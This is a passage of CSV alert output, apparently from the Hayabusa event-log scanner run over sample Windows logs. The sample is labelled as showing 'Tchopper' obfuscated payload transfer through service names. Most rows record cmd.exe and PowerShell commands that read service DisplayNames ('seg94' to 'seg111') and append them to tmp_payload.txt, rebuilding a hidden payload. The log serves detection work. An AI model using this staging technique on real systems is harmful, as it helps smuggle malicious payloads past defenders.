payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:42.227 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:43.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:43.667 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:43.667 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:45.132 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:45.132 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:45.132 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:46.606 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:46.606 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:46.606 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:48.052 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:48.067 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:48.067 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:49.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:49.508 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:49.508 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:50.946 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:50.946 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:50.946 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:52.406 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:52.406 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:52.406 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:53.855 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:53.855 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:53.855 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:55.301 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:55.317 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:55.317 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:56.773 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:56.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:56.788 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:58.226 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:58.226 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:58.226 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:59.674 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:59.674 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:36:59.674 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:01.121 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:01.121 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:01.121 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:02.569 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:02.585 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:02.585 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:04.023 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:04.023 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:04.023 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:05.464 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:05.464 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:05.464 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:06.905 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:06.905 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:06.905 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:08.513 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:37:08.513 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
